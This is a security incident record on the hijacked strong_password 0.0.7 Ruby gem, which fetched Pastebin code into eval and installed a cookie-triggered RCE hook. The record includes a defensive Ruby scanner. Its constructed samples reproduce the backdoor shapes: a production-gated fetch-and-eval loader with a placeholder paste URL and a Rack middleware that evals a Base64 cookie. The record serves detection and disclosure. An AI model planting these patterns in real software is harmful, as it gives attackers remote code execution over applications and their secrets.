strong_password Ruby gem backdoor stole secrets
strong_password 0.0.7 was published to RubyGems from a hijacked account, without the maintainer's involvement. Under a Rails production environment it fetched Ruby code from Pastebin and installed a cookie-driven RCE backdoor.
Story
strong_password was compromised before the rest-client incident but exposed the same failure mode. Attackers published version 0.0.7 under the legitimate RubyGems name while the GitHub repository showed no corresponding change or release. The RubyGems owner shown for the gem was a sparse account named kickball, not the known maintainer.
Tute Costa found the mismatch while reviewing dependency updates. The malicious code had been appended to lib/strong_password/strength_checker.rb: it started a background thread, waited a random interval, fetched Ruby source from a Pastebin raw URL and passed it to eval, but only when Rails.env[0] == "p", i.e. in production-like environments and never in the development or test environments where a reviewer would actually exercise the gem.
The fetched payload installed a Rack middleware hook that Base64-decoded the value of a specially crafted ___id request cookie and passed it to eval, giving anyone who could send that cookie remote code execution inside the application. It also phoned home with the host's URL. A password-strength library has no reason to read cookies or fetch executable code, but once loaded into a Rails application it runs inside the application process with full access to its secrets and data.
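As an added example (not code from strong_password or from the original analysis), the following heuristic scanner looks for the two backdoor shapes described above: a remote fetch whose body is passed to eval, gated on a Rails.env check and run from a background thread, and an eval of Base64 or cookie-derived request data. The regexes are my own choices, the sample sources are constructed to resemble the described code rather than the real payload, and the pastebin URL in the sample is a placeholder.

```ruby
# Heuristic scanner for the backdoor shapes described in the strong_password
# write-up. Added example; not code from the gem or the original analysis.
module GemBackdoorScan
  # Per-line rules: each regexp is tested against every line of a source file.
  LINE_RULES = {
    # eval() applied directly to the body of a network fetch
    eval_of_fetch: /\beval\s*\(\s*(?:Net::HTTP\.get|URI\.open|open\s*\()/,
    # raw paste URLs have no business in a library's runtime path
    pastebin_raw:  %r{https?://pastebin\.com/raw/}i,
    # "is this production?" guard that keeps the payload dormant under dev/test
    env_gate:      /Rails\.env(?:\[0\]|\.first|\.to_s\[0\])\s*==\s*["']p["']/,
    # eval of cookie- or Base64-derived data, the shape of the ___id hook
    cookie_eval:   /\beval\b.*(?:Base64|cookies\b|HTTP_COOKIE)/,
  }.freeze

  # File-level rule: all three fragments must appear somewhere in one file.
  FILE_RULES = {
    threaded_loader: [/Thread\.new/, /Net::HTTP|URI\b/, /\beval\b/],
  }.freeze

  Finding = Struct.new(:file, :rule, :line, :text)

  # Scan one source string; returns an array of Finding (line 0 = file-level).
  def self.scan_source(src, name = "(string)")
    findings = []
    src.each_line.with_index(1) do |line, n|
      LINE_RULES.each do |rule, re|
        findings << Finding.new(name, rule, n, line.strip) if line.match?(re)
      end
    end
    FILE_RULES.each do |rule, parts|
      findings << Finding.new(name, rule, 0, "thread + fetch + eval co-occur") if parts.all? { |re| src.match?(re) }
    end
    findings
  end

  # Sorted, de-duplicated rule names hit by a source string.
  def self.rules_hit(src)
    scan_source(src).map(&:rule).uniq.sort
  end

  # Scan every .rb file under an unpacked gem directory (as produced by `gem unpack`).
  def self.scan_gem_dir(dir)
    Dir.glob(File.join(dir, "**", "*.rb")).sort.flat_map { |f| scan_source(File.read(f), f) }
  end
end

# Constructed sample shaped like the described 0.0.7 loader: a legitimate-looking
# class followed by a background thread that fetches and evals remote code only
# in production. The pastebin URL is a placeholder, not the real paste.
SAMPLE_LOADER = <<~RUBY
  module StrongPassword
    class StrengthChecker
      def is_strong?(password)
        password.length >= 10
      end
    end
  end
  Thread.new { loop { sleep rand * 3333; eval(Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER'))) } } if Rails.env[0] == "p"
RUBY

# Constructed sample shaped like the cookie-driven Rack hook the payload installed.
SAMPLE_HOOK = <<~RUBY
  class CookieHook
    def initialize(app)
      @app = app
    end

    def call(env)
      id = Rack::Request.new(env).cookies["___id"]
      eval(Base64.urlsafe_decode64(id)) if id
      @app.call(env)
    end
  end
RUBY

# Constructed benign sample: a network fetch without eval should not be flagged.
SAMPLE_BENIGN = <<~RUBY
  require "json"
  require "net/http"

  def fetch_json(url)
    JSON.parse(Net::HTTP.get(URI(url)))
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  samples = { "sample-loader.rb" => SAMPLE_LOADER, "sample-hook.rb" => SAMPLE_HOOK, "sample-benign.rb" => SAMPLE_BENIGN }
  findings = ARGV.empty? ? samples.flat_map { |n, s| GemBackdoorScan.scan_source(s, n) }
                         : ARGV.flat_map { |d| GemBackdoorScan.scan_gem_dir(d) }
  findings.each { |f| puts format("%-18s %-16s line %-3d %s", f.file, f.rule, f.line, f.text) }
end
```

Run it with no arguments to scan the embedded samples, or pass one or more directories of unpacked gem sources. The rules are deliberately narrow so they produce few false positives; they complement, rather than replace, diffing the published gem's contents against the tagged source in the project's repository, which is the check that exposed this release. Note that because of the environment gate, simply loading the gem in a development or test environment would not have revealed the behaviour.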
The maintainer confirmed that the bogus 0.0.7 release was created on June 25, 2019 and that he no longer held ownership of the gem on RubyGems. RubyGems yanked the release, locked the publishing account used for the attack, and restored the maintainer's ownership. A few days later, the maintainer said the likely path was an old, reused RubyGems password that had been exposed in an unrelated breach. After regaining control, he removed kickball as an owner, reset the account with a unique password and MFA, and published 0.0.8 as the clean release users should move to.
Affected Artifacts
strong_password
- Observed: 2019-06-25 to 2019-06-29
- Compromised versions: 0.0.7
- Fixed: 0.0.8
- Hashes: sha256:c3a46b979b941ecc456639033754f3bad3f5d379df064d4ccd0b54d0fb8e46ea
- The malicious 0.0.7 release was created on 2019-06-25 and appeared only on RubyGems, not in the GitHub repository.
- The legitimate maintainer later said an old reused RubyGems password was the likely source of the account takeover and published 0.0.8 after regaining control.
Incident Context
- Motive: Credential Theft
- Attribution: Person
- Cause: Compromised Account Credentials
- Transitive: No
- Actor: Individual Hacker
External References
- CVE-2019-13354: strong_password embedded malicious code (sonatype.com)
- strong_password v0.0.7 rubygem hijacked (withatwist.dev)
- strong_password maintainer comment on the RubyGems account takeover (news.ycombinator.com)
- Code execution back door found in Ruby's rest-client library (snyk.io)
- Backdoored Ruby gems stole credentials, injected cryptomining code (helpnetsecurity.com)
Source record: oss/attacks/strong_password/meta.yaml